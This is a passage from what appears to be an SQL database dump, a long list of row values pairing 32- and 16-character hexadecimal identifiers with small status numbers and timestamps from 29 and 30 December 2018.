(43957, '94d29b6c24725ce4faefb18e5ba330cc', '6e117bd555667400', 0, 2, 1, '2018-12-29 17:31:27'),
(43958, '81eedd85070dd64eaac155c78bb6d549', '4727f9281a8da559', 0, 2, 1, '2018-12-29 17:31:29'),
(43959, '0d7090d1eb598063a9f74fb31849ec9c', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-29 17:31:36'),
(43960, '9c3146a1c7fa1e66f22f92d03eecaefd', '45557f71f98e1e99', 0, 2, 1, '2018-12-29 17:31:44'),
(43961, '22ee0758881cf812c26874e6d2e7ad7a', '60ed72c979f92224', 0, 2, 1, '2018-12-29 17:31:45'),
(43962, '0d7090d1eb598063a9f74fb31849ec9c', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-29 17:31:52'),
(43963, '73180367771db5a0e775a5ccda0d703d', '0bbeb47c0399a06a', 0, 2, 1, '2018-12-29 17:32:04'),
(43964, '9c3146a1c7fa1e66f22f92d03eecaefd', '45557f71f98e1e99', 0, 2, 1, '2018-12-29 17:32:05'),
(43965, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2018-12-29 17:32:05'),
(43966, '0d7090d1eb598063a9f74fb31849ec9c', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-29 17:32:05'),
(43967, '91c9fdbcd1466291fd81b3d1d6d4b709', '7b97e0e18deae8e0', 0, 2, 1, '2018-12-29 17:32:10'),
(43968, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 17:32:32'),
(43969, '062a0a92fb7f693f0712a73db9ebcfc4', '91d21119de46096c', 0, 2, 1, '2018-12-29 17:32:48'),
(43970, '6b6b179423f2a0c9f363cb11f7dbf2ec', '1c68b977b911188c', 0, 2, 1, '2018-12-29 17:33:16'),
(43971, '1a2a890c954bfe22d3e82de51fd62132', '83bb13387505b354', 0, 2, 1, '2018-12-29 17:34:07'),
(43972, '44a58d4c5415788315b7902c31f806ee', '68f4521d7790e52c', 0, 2, 1, '2018-12-29 17:35:09'),
(43973, 'e06cade3e82166e1150cac0b0da860f9', '70df5ba7bd3f1512', 0, 2, 1, '2018-12-29 17:35:35'),
(43974, 'e06cade3e82166e1150cac0b0da860f9', '70df5ba7bd3f1512', 0, 2, 1, '2018-12-29 17:35:58'),
(43975, 'd4f773a395bc32be12e0f286990f4fe8', '57a3d4b8ea87b3d9', 0, 2, 1, '2018-12-29 17:38:38'),
(43976, '5ed73011862361f73af69e9ed636493e', '3683b4ef9710cce8', 0, 2, 1, '2018-12-29 17:39:08'),
(43977, '5ed73011862361f73af69e9ed636493e', '3683b4ef9710cce8', 0, 2, 1, '2018-12-29 17:39:46'),
(43978, '5ed73011862361f73af69e9ed636493e', '3683b4ef9710cce8', 0, 2, 1, '2018-12-29 17:40:08'),
(43979, 'd4f773a395bc32be12e0f286990f4fe8', '57a3d4b8ea87b3d9', 0, 2, 1, '2018-12-29 17:40:13'),
(43980, '5ed73011862361f73af69e9ed636493e', '3683b4ef9710cce8', 0, 2, 1, '2018-12-29 17:40:26'),
(43981, 'a7fe519655648ab5544f37fea38a5869', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-29 17:41:11'),
(43982, 'b1bf4410600a7054709afd6fb74b8468', '1c68b977b911188c', 0, 2, 1, '2018-12-29 17:42:34'),
(43983, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-29 17:43:32'),
(43984, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-29 17:43:43'),
(43985, '412ade117ee0a6b7372f39aa54d36c5c', 'a5cf2bfb37ea569d', 0, 2, 1, '2018-12-29 17:43:46'),
(43986, '83225f387d86cd60e216974b47e38ee7', '46713cac27a94b83', 0, 2, 1, '2018-12-29 17:45:53'),
(43987, '67df16924c1bd0b92db00a01e7988162', 'b3e086714401d576', 0, 2, 1, '2018-12-29 17:48:01'),
(43988, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 17:49:13'),
(43989, '3c4054f7083a0b55c31886d046a7b1f5', '9968c5be4a7971a2', 0, 2, 1, '2018-12-29 17:50:14'),
(43990, '1c35e55ca81a86cd12357b1617e7cad1', '863b661787591b2d', 0, 2, 1, '2018-12-29 17:51:08'),
(43991, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 17:51:48'),
(43992, 'ca8ae3f49dd42ad73c9649dbc52fee5c', '6476e71d54522cc6', 0, 2, 1, '2018-12-29 17:52:52'),
(43993, 'f1b9f3d4ddbb3fdb40c0a2ea91033a23', '9d6c8fccb925ba29', 0, 2, 1, '2018-12-29 17:53:30'),
(43994, '95becd42d1a0642fe4e6c4168c9b85a4', 'c520b35eb4576872', 0, 2, 1, '2018-12-29 17:53:47'),
(43995, 'ddfd7b65f18a997fd167ce4bfed41255', 'e3454d790deac400', 0, 2, 1, '2018-12-29 17:55:10'),
(43996, 'a7fe519655648ab5544f37fea38a5869', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-29 17:55:58'),
(43997, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-29 17:59:10'),
(43998, '31062164e0ecb4c52f834afd0e68a266', 'b53c70bea01d2d6e', 0, 2, 1, '2018-12-29 17:59:32'),
(43999, '81e1e877482d1a260cd7d0f3a78beaa3', '142694e678124c3e', 0, 2, 1, '2018-12-29 18:01:46'),
(44000, '81e1e877482d1a260cd7d0f3a78beaa3', '142694e678124c3e', 0, 2, 1, '2018-12-29 18:02:13'),
(44001, '1c35e55ca81a86cd12357b1617e7cad1', '863b661787591b2d', 0, 2, 1, '2018-12-29 18:02:13'),
(44002, '81e1e877482d1a260cd7d0f3a78beaa3', '142694e678124c3e', 0, 2, 1, '2018-12-29 18:02:29'),
(44003, 'be1a8db176d6be564305c1cbfa185e1f', '89872404186e372a', 0, 2, 1, '2018-12-29 18:08:30'),
(44004, 'f5ffc8abf7ea082050f75e9982359ea4', 'c5b85042afb7501d', 0, 2, 1, '2018-12-29 18:08:58'),
(44005, 'f5ffc8abf7ea082050f75e9982359ea4', 'c5b85042afb7501d', 0, 2, 1, '2018-12-29 18:11:20'),
(44006, '2a54a10f47f53e536f6d8017ae1af979', '83f3f9050d0f12fd', 0, 2, 1, '2018-12-29 18:13:46'),
(44007, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 18:16:11'),
(44008, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 18:17:50'),
(44009, 'c587c8aa41b086848058ef32c76dbbbe', '01095793f4241226', 0, 2, 1, '2018-12-29 18:18:27'),
(44010, 'c5714d7463238f793dcef8c1f23a8821', '33c0af73ba240498', 0, 2, 1, '2018-12-29 18:18:34'),
(44011, '0c2955abae179a77931df53eb31447b9', '01095793f4241226', 0, 2, 1, '2018-12-29 18:18:43'),
(44012, '8432ee8afbd93176608d12ab8bfded81', '722ae2714d0a4d5a', 0, 2, 1, '2018-12-29 18:19:39'),
(44013, 'ddfd7b65f18a997fd167ce4bfed41255', 'e3454d790deac400', 0, 2, 1, '2018-12-29 18:22:00'),
(44014, '662fbb6d56b84fe319c0a6b9cf9078c9', '8016dc9552fe132f', 0, 2, 1, '2018-12-29 18:22:13'),
(44015, 'c5714d7463238f793dcef8c1f23a8821', '33c0af73ba240498', 0, 2, 1, '2018-12-29 18:22:24'),
(44016, '4db1668aeaf3b5f96d3ce8375a8e3008', '638f6b1ac3b915c3', 0, 2, 1, '2018-12-29 18:22:41'),
(44017, '4db1668aeaf3b5f96d3ce8375a8e3008', '638f6b1ac3b915c3', 0, 2, 1, '2018-12-29 18:23:10'),
(44018, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 18:24:21'),
(44019, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2018-12-29 18:24:50'),
(44020, '1c35e55ca81a86cd12357b1617e7cad1', '863b661787591b2d', 0, 2, 1, '2018-12-29 18:25:43'),
(44021, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-29 18:26:19'),
(44022, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-29 18:26:38'),
(44023, '2183c555604a84a645b1e8b7df024acc', 'c020abbb40884763', 0, 2, 1, '2018-12-29 18:26:48'),
(44024, '2183c555604a84a645b1e8b7df024acc', 'c020abbb40884763', 0, 2, 1, '2018-12-29 18:26:54'),
(44025, '1d2f8c9ade521a17c75004a59b2da4ce', '863b661787591b2d', 0, 2, 1, '2018-12-29 18:27:35'),
(44026, 'a0f2a7252667a5fa98281d089da9c57e', 'c7b5d5ace7ac066b', 0, 2, 1, '2018-12-29 18:27:52'),
(44027, 'ca8ae3f49dd42ad73c9649dbc52fee5c', '6476e71d54522cc6', 0, 2, 1, '2018-12-29 18:28:04'),
(44028, '2183c555604a84a645b1e8b7df024acc', 'c020abbb40884763', 0, 2, 1, '2018-12-29 18:28:05'),
(44029, '6647a86677fd733d1078a6a781acf845', '7501b42c35accff7', 0, 2, 1, '2018-12-29 18:28:25'),
(44030, '47ebfe04842ec8997e5b9c3e10b02084', '863b661787591b2d', 0, 2, 1, '2018-12-29 18:28:47'),
(44031, '0c2955abae179a77931df53eb31447b9', '01095793f4241226', 0, 2, 1, '2018-12-29 18:29:05'),
(44032, 'a0f2a7252667a5fa98281d089da9c57e', 'c7b5d5ace7ac066b', 0, 2, 1, '2018-12-29 18:30:33'),
(44033, '1a2a890c954bfe22d3e82de51fd62132', '83bb13387505b354', 0, 2, 1, '2018-12-29 18:31:15'),
(44034, 'a0f2a7252667a5fa98281d089da9c57e', 'c7b5d5ace7ac066b', 0, 2, 1, '2018-12-29 18:31:27'),
(44035, 'ddfd7b65f18a997fd167ce4bfed41255', 'e3454d790deac400', 0, 2, 1, '2018-12-29 18:31:35'),
(44036, '0c2955abae179a77931df53eb31447b9', '01095793f4241226', 0, 2, 1, '2018-12-29 18:34:22'),
(44037, 'b272de3acf0e7abaf04f11bc934d0898', 'e3413f2163c4f64a', 0, 2, 1, '2018-12-29 18:34:37'),
(44038, 'c5714d7463238f793dcef8c1f23a8821', '33c0af73ba240498', 0, 2, 1, '2018-12-29 18:35:19'),
(44039, '7bf6f8616859cfcb5c1bd76f35e641ce', '16d2e6e92c47b8e6', 0, 2, 1, '2018-12-29 18:37:20'),
(44040, '8057300fbb0947f78b5877781929a97e', '9ce6f87eed9d7b6a', 0, 2, 1, '2018-12-29 18:38:55'),
(44041, '0c2955abae179a77931df53eb31447b9', '01095793f4241226', 0, 2, 1, '2018-12-29 18:39:10'),
(44042, '59174253acc20b5d733aaa6f222e952a', '3d500566c712ade6', 0, 2, 1, '2018-12-29 18:40:33'),
(44043, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 18:41:49'),
(44044, '9820094dcad2c90ed8acfa79bb8ba3e6', 'ff674f5b621b97d9', 0, 2, 1, '2018-12-29 18:42:00'),
(44045, '4db1668aeaf3b5f96d3ce8375a8e3008', '638f6b1ac3b915c3', 0, 2, 1, '2018-12-29 18:43:24'),
(44046, '218a9737c8156723e8fc177808188e02', '22ddd94189155c9d', 0, 2, 1, '2018-12-29 18:44:33'),
(44047, '89d5e917d8ba24b2b74ceb15ee728e96', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-29 18:44:47'),
(44048, '4db1668aeaf3b5f96d3ce8375a8e3008', '638f6b1ac3b915c3', 0, 2, 1, '2018-12-29 18:45:01'),
(44049, '218a9737c8156723e8fc177808188e02', '22ddd94189155c9d', 0, 2, 1, '2018-12-29 18:45:50'),
(44050, '34a83573faee8b7f6de3ff7d71695052', '7a31f00a55ce5e61', 0, 2, 1, '2018-12-29 18:47:39'),
(44051, '0c2955abae179a77931df53eb31447b9', '01095793f4241226', 0, 2, 1, '2018-12-29 18:51:20'),
(44052, '0c2955abae179a77931df53eb31447b9', '01095793f4241226', 0, 2, 1, '2018-12-29 18:52:38'),
(44053, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 18:52:54'),
(44054, '9adf32929bf0f18d75aa4e88906c6122', '01095793f4241226', 0, 2, 1, '2018-12-29 18:57:00'),
(44055, '89d5e917d8ba24b2b74ceb15ee728e96', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-29 18:57:23'),
(44056, '89d5e917d8ba24b2b74ceb15ee728e96', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-29 18:57:55'),
(44057, 'a7fe519655648ab5544f37fea38a5869', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-29 18:59:22'),
(44058, '94661d47e75f798a53a16ee6c8fdb011', 'e2b4551dd1887dfb', 0, 2, 1, '2018-12-29 18:59:40'),
(44059, 'e56563fc215aa24254ed5477cb10e9ca', '863b661787591b2d', 0, 2, 1, '2018-12-29 19:04:15'),
(44060, '0582c2c88f70818f9837b18a669e126e', '6092d6c1cb041b23', 0, 2, 1, '2018-12-29 19:10:37'),
(44061, '9ebcdd164d1b910f4fa78fd02c9f1487', 'c996d3f4a66c1d4b', 0, 2, 1, '2018-12-29 19:12:17'),
(44062, '31062164e0ecb4c52f834afd0e68a266', 'b53c70bea01d2d6e', 0, 2, 1, '2018-12-29 19:12:46'),
(44063, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 19:13:42'),
(44064, '89d5e917d8ba24b2b74ceb15ee728e96', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-29 19:14:26'),
(44065, '036ed7e828921bfc9deb99476c75db6e', '113a26d6adf3f967', 0, 2, 1, '2018-12-29 19:14:38'),
(44066, 'e9c86bdc94dd6ccd524c1226c6e31694', '3519c75b0484909f', 0, 2, 1, '2018-12-29 19:14:50'),
(44067, '81ec0abf7e264d4bd070f6231a8cc025', '8d2c560635a7aed5', 0, 2, 1, '2018-12-29 19:15:58'),
(44068, 'e9c86bdc94dd6ccd524c1226c6e31694', '3519c75b0484909f', 0, 2, 1, '2018-12-29 19:15:58'),
(44069, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 19:18:10'),
(44070, '4e5b5528527e435e1e86fc00edafa362', '7c5bcf99f2070582', 0, 2, 1, '2018-12-29 19:20:05'),
(44071, 'be1a8db176d6be564305c1cbfa185e1f', '89872404186e372a', 0, 2, 1, '2018-12-29 19:20:21'),
(44072, '31274d4a0f33d42f23b5cb9db1769b71', 'b2bafb74467116e9', 0, 2, 1, '2018-12-29 19:24:12'),
(44073, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-29 19:30:50'),
(44074, '9adf32929bf0f18d75aa4e88906c6122', '01095793f4241226', 0, 2, 1, '2018-12-29 19:30:53'),
(44075, '4e5b5528527e435e1e86fc00edafa362', '7c5bcf99f2070582', 0, 2, 1, '2018-12-29 19:32:34'),
(44076, 'e9c86bdc94dd6ccd524c1226c6e31694', '3519c75b0484909f', 0, 2, 1, '2018-12-29 19:32:38'),
(44077, '9adf32929bf0f18d75aa4e88906c6122', '01095793f4241226', 0, 2, 1, '2018-12-29 19:35:11'),
(44078, '21962edae5d6e6d2853abf9b6daaf88e', 'f8f70c95a9dd1c3e', 0, 2, 1, '2018-12-29 19:35:31'),
(44079, '574697b797bbf01bfddad2c5a745200a', '8b67051b42687f96', 0, 2, 1, '2018-12-29 19:36:41'),
(44080, 'e9c86bdc94dd6ccd524c1226c6e31694', '3519c75b0484909f', 0, 2, 1, '2018-12-29 19:38:36'),
(44081, '4937a66c67f54caa100acf47d85e4c50', '4df5ced8675ad994', 0, 2, 1, '2018-12-29 19:39:26'),
(44082, 'e9c86bdc94dd6ccd524c1226c6e31694', '3519c75b0484909f', 0, 2, 1, '2018-12-29 19:41:09'),
(44083, 'e9c86bdc94dd6ccd524c1226c6e31694', '3519c75b0484909f', 0, 2, 1, '2018-12-29 19:43:21'),
(44084, 'e9c86bdc94dd6ccd524c1226c6e31694', '3519c75b0484909f', 0, 2, 1, '2018-12-29 19:44:21'),
(44085, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-29 19:49:42'),
(44086, 'b98424a48977c79bcc4deb7fc0fcbe95', '36a5dd386d60b877', 0, 2, 1, '2018-12-29 19:57:24'),
(44087, '715f70ce8cdf463a04d10b6bcf27f614', 'c5b85042afb7501d', 0, 2, 1, '2018-12-29 20:08:32'),
(44088, '4e5b5528527e435e1e86fc00edafa362', '7c5bcf99f2070582', 0, 2, 1, '2018-12-29 20:09:32'),
(44089, '2f41415fe794a20afdd873289150f3be', '0b1466b4de9b8a16', 0, 2, 1, '2018-12-29 20:09:57'),
(44090, '2f41415fe794a20afdd873289150f3be', '0b1466b4de9b8a16', 0, 2, 1, '2018-12-29 20:13:05'),
(44091, '52e8627d1b6221ddfc8f89661665584c', 'c1decbbf9aca33ae', 0, 2, 1, '2018-12-29 20:15:59'),
(44092, '52e8627d1b6221ddfc8f89661665584c', 'c1decbbf9aca33ae', 0, 2, 1, '2018-12-29 20:20:58'),
(44093, '89d5e917d8ba24b2b74ceb15ee728e96', 'b88d7d1f8a3bb1f5', 0, 2, 1, '2018-12-29 20:21:28'),
(44094, '8334a1ef4ec9b2a1a5f22c32e2555d9b', '440de76d5196cd90', 0, 2, 1, '2018-12-29 20:22:25'),
(44095, '8334a1ef4ec9b2a1a5f22c32e2555d9b', '440de76d5196cd90', 0, 2, 1, '2018-12-29 20:23:04'),
(44096, '8334a1ef4ec9b2a1a5f22c32e2555d9b', '440de76d5196cd90', 0, 2, 1, '2018-12-29 20:23:17'),
(44097, '8334a1ef4ec9b2a1a5f22c32e2555d9b', '440de76d5196cd90', 0, 2, 1, '2018-12-29 20:23:53'),
(44098, '8334a1ef4ec9b2a1a5f22c32e2555d9b', '440de76d5196cd90', 0, 2, 1, '2018-12-29 20:24:00'),
(44099, 'bd78d94601f85927fb1ae8be25943016', 'd2f9cd5e23fe271d', 0, 2, 1, '2018-12-29 20:24:23'),
(44100, '4e5b5528527e435e1e86fc00edafa362', '7c5bcf99f2070582', 0, 2, 1, '2018-12-29 20:24:53'),
(44101, 'bd78d94601f85927fb1ae8be25943016', 'd2f9cd5e23fe271d', 0, 2, 1, '2018-12-29 20:25:16'),
(44102, '8334a1ef4ec9b2a1a5f22c32e2555d9b', '440de76d5196cd90', 0, 2, 1, '2018-12-29 20:25:33'),
(44103, 'bd78d94601f85927fb1ae8be25943016', 'd2f9cd5e23fe271d', 0, 2, 1, '2018-12-29 20:27:25'),
(44104, '8334a1ef4ec9b2a1a5f22c32e2555d9b', '440de76d5196cd90', 0, 2, 1, '2018-12-29 20:27:56'),
(44105, '8334a1ef4ec9b2a1a5f22c32e2555d9b', '440de76d5196cd90', 0, 2, 1, '2018-12-29 20:28:49'),
(44106, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-29 20:45:49'),
(44107, '7eb17b357551de10d1444b774ed4c235', '8be72016631e61c8', 0, 2, 1, '2018-12-29 20:51:47'),
(44108, 'dc0deeac13808f846f5556434241b60b', 'e79584c848c88665', 0, 2, 1, '2018-12-29 20:52:03'),
(44109, 'f3bc65e796407515a7206a3f21f2ef86', 'c2661b0145031dbd', 0, 2, 1, '2018-12-29 20:58:59'),
(44110, 'f86cbcdb4223a464262699b9a70cdfcd', '1acf86a6e41410fd', 0, 2, 1, '2018-12-29 21:04:05'),
(44111, '491123a3af81c60fe17f7eb8a957982e', '9b701ee99a0ffaad', 0, 2, 1, '2018-12-29 21:04:42'),
(44112, '491123a3af81c60fe17f7eb8a957982e', '9b701ee99a0ffaad', 0, 2, 1, '2018-12-29 21:08:03'),
(44113, '3c75cff8122c98f1b16df27f84c4d882', '86aa7a888d62cb56', 0, 2, 1, '2018-12-29 21:10:10'),
(44114, '07e63dc2b7973525c86332530110c181', '9ec5e520ab857cc5', 0, 2, 1, '2018-12-29 21:17:22'),
(44115, '491123a3af81c60fe17f7eb8a957982e', '9b701ee99a0ffaad', 0, 2, 1, '2018-12-29 21:29:25'),
(44116, '1e6deadef107a4525ca2a350fba3e1dd', 'd8d9a213e7f9abee', 0, 2, 1, '2018-12-29 21:36:16'),
(44117, '3c29ed96848e42cdb7f3d1787b2e74f2', 'de9b8e6bc6e762ed', 0, 2, 1, '2018-12-29 21:39:07'),
(44118, '618f0a1521f17b76ee6433adbe96814b', '0530018377078939', 0, 2, 1, '2018-12-29 21:48:07'),
(44119, 'b2e3da05dd4f935a8424a4dc63b8a5d6', 'cd346dd6fdcb3f3c', 0, 2, 1, '2018-12-29 22:09:30'),
(44120, 'acafc7169692d379e03068518c457499', '09efcb8d7bf145dc', 0, 2, 1, '2018-12-29 22:29:55'),
(44121, 'dded66486309faa8cf9b39a18507725a', '058ba5a9de443545', 0, 2, 1, '2018-12-29 22:31:03'),
(44122, 'aa71d9fcdf79c2d95a080de38d8fc9cf', '7e68ce54628f03c9', 0, 2, 1, '2018-12-29 22:38:11'),
(44123, 'b10419557eb2967bce8dcc309044e411', 'c84e9b613e41046a', 0, 2, 1, '2018-12-29 23:13:41'),
(44124, 'b10419557eb2967bce8dcc309044e411', 'c84e9b613e41046a', 0, 2, 1, '2018-12-29 23:13:56'),
(44125, 'b10419557eb2967bce8dcc309044e411', 'c84e9b613e41046a', 0, 2, 1, '2018-12-29 23:14:51'),
(44126, '71073d916b39b382bca9e778cfaa16be', '12026420be6c25d1', 0, 2, 1, '2018-12-29 23:27:58'),
(44127, '421f39797b925012e06d5a083c3ec426', 'a796baf1a9b40f7c', 0, 2, 1, '2018-12-29 23:32:37'),
(44128, '421f39797b925012e06d5a083c3ec426', 'a796baf1a9b40f7c', 0, 2, 1, '2018-12-29 23:35:23'),
(44129, '421f39797b925012e06d5a083c3ec426', 'a796baf1a9b40f7c', 0, 2, 1, '2018-12-29 23:35:51'),
(44130, '8a139da4a35d7f2ce984ee629274cc36', 'a9b92c277f4192cc', 0, 2, 1, '2018-12-29 23:42:26'),
(44131, '54fdabdf4358cf9178fe9b08b0cadc1a', 'c4352e9406c8c756', 0, 2, 1, '2018-12-29 23:45:26'),
(44132, 'e556126107e61392c5f6fafe06002356', '98c75b3a32d613a4', 0, 2, 1, '2018-12-29 23:55:38'),
(44133, 'f5ec9beddbb7937c720779eabc603a16', 'a22f48e96b607d9e', 0, 2, 1, '2018-12-29 23:57:05'),
(44134, 'f5ec9beddbb7937c720779eabc603a16', 'a22f48e96b607d9e', 0, 2, 1, '2018-12-29 23:58:17'),
(44135, 'f5ec9beddbb7937c720779eabc603a16', 'a22f48e96b607d9e', 0, 2, 1, '2018-12-29 23:58:49'),
(44136, 'f5ec9beddbb7937c720779eabc603a16', 'a22f48e96b607d9e', 0, 2, 1, '2018-12-29 23:59:38'),
(44137, 'f5ec9beddbb7937c720779eabc603a16', 'a22f48e96b607d9e', 0, 2, 1, '2018-12-29 23:59:58'),
(44138, 'f5ec9beddbb7937c720779eabc603a16', 'a22f48e96b607d9e', 0, 2, 1, '2018-12-30 00:01:10'),
(44139, '58e8061354f31d55eb3afb4bad1a5cfa', '141c828a3c4cb6c8', 0, 2, 1, '2018-12-30 00:01:22'),
(44140, 'f5ec9beddbb7937c720779eabc603a16', 'a22f48e96b607d9e', 0, 2, 1, '2018-12-30 00:01:57'),
(44141, '59a5a5fd4c8b5ca028840031fb1cf130', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-30 00:04:25'),
(44142, 'f5ec9beddbb7937c720779eabc603a16', 'a22f48e96b607d9e', 0, 2, 1, '2018-12-30 00:10:49'),
(44143, 'f5ec9beddbb7937c720779eabc603a16', 'a22f48e96b607d9e', 0, 2, 1, '2018-12-30 00:11:19'),
(44144, 'cef51485948ed4d0efa9f1111aa3b0e6', '64999e9f1769c8f9', 0, 2, 1, '2018-12-30 00:24:20'),
(44145, '062a0a92fb7f693f0712a73db9ebcfc4', '91d21119de46096c', 0, 2, 1, '2018-12-30 00:46:36'),
(44146, 'babfb1e01a58e058fcca1f4e164b3033', 'f4970f9dcee0617b', 0, 2, 1, '2018-12-30 01:20:47'),
(44147, '22cc9f1426c59b6391fa9b92fa2638d8', 'a70eabd0089b3eb6', 0, 2, 1, '2018-12-30 01:20:55'),
(44148, '968120e635581c8e7f3d10b29bfdf55b', '912f28924119ee96', 0, 2, 1, '2018-12-30 01:29:00'),
(44149, 'db702b40bce4ca7f1ce522f43dc2262e', '3e07c8d2cc59ef04', 0, 2, 1, '2018-12-30 01:50:23'),
(44150, '97409ce58e3915b6fbfff9f6ea71060c', '67d9c3341cc72093', 0, 2, 1, '2018-12-30 02:09:27'),
(44151, '79cdce4e0677c2e39d3ec689ca631ee2', '6400e33610c7bb8a', 0, 2, 1, '2018-12-30 02:52:53'),
(44152, 'e73cc08b64d9581d8b268bf06d9f6b42', '0260179085a13d3c', 0, 2, 1, '2018-12-30 02:54:05'),
(44153, 'f8a101d42c3d3f35ebf0bbad3d1be7d1', '3a13e6bf9c8a2109', 0, 2, 1, '2018-12-30 02:56:10'),
(44154, 'a723231fca5047cf0e2c2f10ac904cea', 'fbf0576065758144', 0, 2, 1, '2018-12-30 03:00:38'),
(44155, '763156461759bfba7b021afe5f0a624e', '142694e678124c3e', 0, 2, 1, '2018-12-30 03:06:51'),
(44156, 'a0ebd6dbbe73373b335c6de37b7a901e', 'dc12e9364d934584', 0, 2, 1, '2018-12-30 03:27:26'),
(44157, '5e056e81f29344c4d77f517a2e8949ac', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-30 04:09:49'),
(44158, '634849751a3d69c25a62b979387aabd9', 'fb1511ad7e41ba4b', 0, 2, 1, '2018-12-30 04:18:50'),
(44159, '52e8627d1b6221ddfc8f89661665584c', 'c1decbbf9aca33ae', 0, 2, 1, '2018-12-30 04:21:32'),
(44160, 'f5ec9beddbb7937c720779eabc603a16', 'a22f48e96b607d9e', 0, 2, 1, '2018-12-30 04:31:27'),
(44161, 'f5ec9beddbb7937c720779eabc603a16', 'a22f48e96b607d9e', 0, 2, 1, '2018-12-30 04:32:18'),
(44162, 'f5ec9beddbb7937c720779eabc603a16', 'a22f48e96b607d9e', 0, 2, 1, '2018-12-30 04:34:23'),
(44163, 'f5ec9beddbb7937c720779eabc603a16', 'a22f48e96b607d9e', 0, 2, 1, '2018-12-30 04:36:19'),
(44164, '8d096ae4b6aa468ec58ebaf7bf667e72', '91ef363cd555243f', 0, 2, 1, '2018-12-30 04:43:50'),
(44165, 'e34ce251c8ae8462c6c402b5c30b0d06', '210f256102d89b80', 0, 2, 1, '2018-12-30 04:43:51'),
(44166, 'd80f563db01c33f82ac25fd470ba5f6a', '7cd748af470b76f4', 0, 2, 1, '2018-12-30 05:03:56'),
(44167, 'd80f563db01c33f82ac25fd470ba5f6a', '7cd748af470b76f4', 0, 2, 1, '2018-12-30 05:06:20'),
(44168, 'a849b7bafa7419e604e244563e45c09c', '76220058b75de2fd', 0, 2, 1, '2018-12-30 05:08:21'),
(44169, 'c74707dd2bc9d98daa235c26f1436b72', '20297cd9a8921fba', 0, 2, 1, '2018-12-30 05:13:53'),
(44170, 'c74707dd2bc9d98daa235c26f1436b72', '20297cd9a8921fba', 0, 2, 1, '2018-12-30 05:13:57'),
(44171, 'c74707dd2bc9d98daa235c26f1436b72', '20297cd9a8921fba', 0, 2, 1, '2018-12-30 05:16:30'),
(44172, 'c74707dd2bc9d98daa235c26f1436b72', '20297cd9a8921fba', 0, 2, 1, '2018-12-30 05:16:35'),
(44173, 'c74707dd2bc9d98daa235c26f1436b72', '20297cd9a8921fba', 0, 2, 1, '2018-12-30 05:18:17'),
(44174, '7793f2e5649b1cc24d3821ec590954de', '8e9e7816173ea9db', 0, 2, 1, '2018-12-30 05:30:51'),
(44175, '7793f2e5649b1cc24d3821ec590954de', '8e9e7816173ea9db', 0, 2, 1, '2018-12-30 05:31:25'),
(44176, '7793f2e5649b1cc24d3821ec590954de', '8e9e7816173ea9db', 0, 2, 1, '2018-12-30 05:32:16'),
(44177, '7793f2e5649b1cc24d3821ec590954de', '8e9e7816173ea9db', 0, 2, 1, '2018-12-30 05:32:37'),
(44178, '41dde254a68bf6124b1c61e9b91d8546', '4329684564169aad', 0, 2, 1, '2018-12-30 05:35:09'),
(44179, '74488d8b76a36f34b7800d34ef33b56b', 'b5dea531bb51b38d', 0, 2, 1, '2018-12-30 05:36:21'),
(44180, '03f397f03ba50967a7494628b5e050e0', 'f4310bcd3a0b59ad', 0, 2, 1, '2018-12-30 05:39:11'),
(44181, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-30 05:42:01'),
(44182, '26007c924755b25125ce12bfc4d9da8a', 'a2b92167f54c9dc2', 0, 2, 1, '2018-12-30 05:42:04'),
(44183, '1a1489833b19f4c5075094454d784162', 'f4310bcd3a0b59ad', 0, 2, 1, '2018-12-30 05:50:07'),
(44184, '7a5ca58758e5883e6f5d4326cf4f1e2f', '50aaab3e55ad1271', 0, 2, 1, '2018-12-30 05:57:54'),
(44185, '0100a45426daaf5037abe31b6639205f', '378b22ffd2015952', 0, 2, 1, '2018-12-30 05:57:54'),
